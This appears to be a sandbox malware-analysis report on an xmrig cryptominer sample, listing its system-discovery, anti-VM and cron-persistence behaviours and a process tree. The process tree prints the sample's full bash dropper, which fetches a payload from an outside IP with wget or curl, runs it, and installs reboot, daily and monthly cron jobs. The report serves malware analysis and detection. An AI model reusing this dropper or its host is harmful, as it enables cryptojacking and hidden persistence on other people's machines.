xmrig | f6371d8b3bcc784017d4fbb544550873281cdc4aa4167ffac91526126d3b4e01

execution persistence privilege_escalatio

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

Cron

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.z8sX6x	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/board_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	.report_system

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

description	ioc	Process
File opened for reading	/proc/cpuinfo	.report_system

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/id	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_cpus	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/level	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition	.report_system
File opened for reading	/sys/devices/system/cpu/possible	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/level	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/size	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/acpi_cppc/nominal_freq	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/topology/die_cpus	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/number_of_sets	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/id	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep

Enumerates kernel/hardware configuration 1 TTPs 26 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/system/node/node0/cpumap	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	.report_system
File opened for reading	/sys/bus/dax/devices	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_bandwidth	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_latency	.report_system
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages	.report_system
File opened for reading	/sys/bus/soc/devices	.report_system
File opened for reading	/sys/devices/system/cpu	.report_system
File opened for reading	/sys/devices/cpu_atom/cpus	.report_system
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	.report_system
File opened for reading	/sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_bandwidth	.report_system
File opened for reading	/sys/fs/cgroup/cpuset.cpus.effective	.report_system
File opened for reading	/sys/devices/cpu_core/cpus	.report_system
File opened for reading	/sys/devices/system/node/online	.report_system
File opened for reading	/sys/devices/system/node/node0/meminfo	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/access1/initiators	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators	.report_system
File opened for reading	/sys/firmware/dmi/tables/DMI	.report_system
File opened for reading	/sys/fs/cgroup/cpuset.mems.effective	.report_system
File opened for reading	/sys/kernel/mm/hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_latency	.report_system
File opened for reading	/sys/devices/virtual/dmi/id	.report_system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/92/cmdline	pgrep
File opened for reading	/proc/1317/status	pgrep
File opened for reading	/proc/1184/status	pgrep
File opened for reading	/proc/583/cmdline	pgrep
File opened for reading	/proc/410/status	pgrep
File opened for reading	/proc/1184/status	pgrep
File opened for reading	/proc/1637/cmdline	pgrep
File opened for reading	/proc/80/status	pgrep
File opened for reading	/proc/16/cmdline	pgrep
File opened for reading	/proc/18/cmdline	pgrep
File opened for reading	/proc/215/status	pgrep
File opened for reading	/proc/1143/status	pgrep
File opened for reading	/proc/757/cmdline	pgrep
File opened for reading	/proc/225/status	pgrep
File opened for reading	/proc/1596/status	pgrep
File opened for reading	/proc/217/cmdline	pgrep
File opened for reading	/proc/1181/status	pgrep
File opened for reading	/proc/669/cmdline	pgrep
File opened for reading	/proc/1046/status	pgrep
File opened for reading	/proc/25/status	pgrep
File opened for reading	/proc/631/status	pgrep
File opened for reading	/proc/218/cmdline	pgrep
File opened for reading	/proc/1299/status	pgrep
File opened for reading	/proc/585/status	pgrep
File opened for reading	/proc/499/cmdline	pgrep
File opened for reading	/proc/222/status	pgrep
File opened for reading	/proc/1419/cmdline	pgrep
File opened for reading	/proc/25/cmdline	pgrep
File opened for reading	/proc/5/cmdline	pgrep
File opened for reading	/proc/1582/cmdline	pgrep
File opened for reading	/proc/259/cmdline	pgrep
File opened for reading	/proc/583/status	pgrep
File opened for reading	/proc/629/status	pgrep
File opened for reading	/proc/1075/status	pgrep
File opened for reading	/proc/1193/cmdline	pgrep
File opened for reading	/proc/25/cmdline	pgrep
File opened for reading	/proc/1326/cmdline	pgrep
File opened for reading	/proc/1294/status	pgrep
File opened for reading	/proc/209/cmdline	pgrep
File opened for reading	/proc/1090/cmdline	pgrep
File opened for reading	/proc/836/cmdline	pgrep
File opened for reading	/proc/1302/cmdline	pgrep
File opened for reading	/proc/1085/cmdline	pgrep
File opened for reading	/proc/409/cmdline	pgrep
File opened for reading	/proc/222/cmdline	pgrep
File opened for reading	/proc/583/status	pgrep
File opened for reading	/proc/836/status	pgrep
File opened for reading	/proc/24/cmdline	pgrep
File opened for reading	/proc/590/cmdline	pgrep
File opened for reading	/proc/73/status	pgrep
File opened for reading	/proc/101/cmdline	pgrep
File opened for reading	/proc/1181/cmdline	pgrep
File opened for reading	/proc/14/cmdline	pgrep
File opened for reading	/proc/632/cmdline	pgrep
File opened for reading	/proc/218/status	pgrep
File opened for reading	/proc/1408/cmdline	pgrep
File opened for reading	/proc/1294/cmdline	pgrep
File opened for reading	/proc/10/status	pgrep
File opened for reading	/proc/94/cmdline	pgrep
File opened for reading	/proc/223/cmdline	pgrep
File opened for reading	/proc/16/cmdline	pgrep
File opened for reading	/proc/11/cmdline	pgrep
File opened for reading	/proc/1326/status	pgrep
File opened for reading	/proc/88/status	pgrep

/tmp/.main.elf
/tmp/.main.elf
1⤵
PID:1596

/bin/bash
/tmp/.main.elf -c "exec '/tmp/.main.elf' \"\$@\"" /tmp/.main.elf
1⤵
PID:1596

/tmp/.main.elf
/tmp/.main.elf
1⤵
PID:1596

/bin/bash
/tmp/.main.elf -c " #!/bin/bash RCU_GP_DIR=\"/var/tmp/.rcu_gp\" REPORT_SYSTEM_URL=\"http://66.63.187.200/.puscarie/.report_system\" DIICOT_FILE=\"diicot\" setup_report_system() { if [ ! -d \"\$RCU_GP_DIR\" ]; then mkdir \"\$RCU_GP_DIR\" fi cd \"\$RCU_GP_DIR\" || exit if command -v wget &> /dev/null; then wget \"\$REPORT_SYSTEM_URL\" -O .report_system elif command -v curl &> /dev/null; then curl -o .report_system \"\$REPORT_SYSTEM_URL\" else echo \"Nu s-a gasit nici wget, nici curl\" exit 1 fi chmod +x .report_system cd - || exit } create_diicot_file() { DIICOT_PATH=\"\$RCU_GP_DIR/\$DIICOT_FILE\" cat <<EOL > \"\$DIICOT_PATH\" #!/bin/bash if ! pgrep -x .report_system >/dev/null; then /var/tmp/.rcu_gp/./.report_system > /dev/null 2>&1 & disown \$* else : fi EOL chmod +x \"\$DIICOT_PATH\" } setup_cron_jobs() { locatie=\"\$RCU_GP_DIR\" locatie2=\"\$PWD\" if [ ! -f \"\$locatie/.ps4\" ]; then echo \"\$locatie\" > \"\$locatie/.ps4\" fi if ! crontab -l | grep -q '.main'; then rm -rf \"\$locatie/.ps5\" echo \"@daily \$locatie/\$DIICOT_FILE\" >> \"\$locatie/.ps5\" sleep 1 echo \"@reboot \$locatie2/.main > /dev/null 2>&1 & disown\" >> \"\$locatie/.ps5\" sleep 1 echo \"@monthly \$locatie2/.main > /dev/null 2>&1 & disown\" >> \"\$locatie/.ps5\" sleep 1 crontab \"\$locatie/.ps5\" sleep 1 rm -rf \"\$locatie/.ps5\" fi } setup_report_system create_diicot_file setup_cron_jobs while : do \$(cat /var/tmp/.rcu_gp/.ps4)/diicot setup_cron_jobs sleep 2.5 done echo \"Merge bn mineru serifule\" " /tmp/.main.elf
1⤵
- File and Directory Permissions Modification
PID:1596
- /usr/bin/mkdir
  mkdir /var/tmp/.rcu_gp
  2⤵
  PID:1597
- /usr/bin/wget
  wget http://66.63.187.200/.puscarie/.report_system -O .report_system
  2⤵
  PID:1598
- /usr/bin/chmod
  chmod +x .report_system
  2⤵
  - File and Directory Permissions Modification
  PID:1623
- /usr/bin/cat
  cat
  2⤵
  PID:1624
- /usr/bin/chmod
  chmod +x /var/tmp/.rcu_gp/diicot
  2⤵
  - File and Directory Permissions Modification
  PID:1625
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1627
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1626
- /usr/bin/rm
  rm -rf /var/tmp/.rcu_gp/.ps5
  2⤵
  PID:1628
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:1629
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:1630
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:1631
- /usr/bin/crontab
  crontab /var/tmp/.rcu_gp/.ps5
  2⤵
  - Creates/modifies Cron job
  PID:1632
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:1633
- /usr/bin/rm
  rm -rf /var/tmp/.rcu_gp/.ps5
  2⤵
  PID:1634
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1635
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1636
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1637
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1639
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1640
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1641
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1649
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1650
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1651
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1652
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1653
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1654
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1655
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1656
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1657
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1658
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1659
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1660
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1661
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1662
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1663
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1665
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1664
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1666
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1667
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1668
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1669
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1671
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1670
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1672
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1673
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1674
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1675
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1677
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1676
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1678
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1679
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1680
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1681
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1683
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1682
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1684
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1685
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1686
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1687
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1688
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1689
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1690
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1693
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1694
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1695
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1697
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1696
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1698
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1699
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1700
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1701
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1703
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1702
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1704
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1705
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1706
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1707
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1708
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1709
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1710
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1711
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1712
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1713
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1715
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1714
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1716
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1717
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1718
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1719
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1721
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1720
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1722
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1723
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1724
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1725
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1727
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1726
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1728
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1729
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1730
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1731
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1733
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1732
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1734
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1735
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1736
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1737
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1739
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1738
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1740
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1741
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1742
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1743
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1745
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1744
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1746
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1747
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1748
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1749
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1751
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1750
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1752
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1753
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1754
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1755
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1757
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1756
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1758
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1759
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1760
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1761
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1763
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1762
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1764
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1765
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1766
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1767
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1769
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1768
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1770
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1771
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1772
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1773
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1775
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1774
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1776
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1777
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1778
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1779
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1781
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1780
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1782
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1783
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1784
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1785
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1787
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1786
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1788
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1789
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1790
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1791
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1793
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1792
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1794
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1795
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1796
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1797
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1798
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1799
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1800
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1801
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1802
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1803
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1805
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1804
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1806
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1807
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1808
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1809
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1811
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1810
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1812
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1813
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1814
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1815
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1817
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1816
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1818
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1819
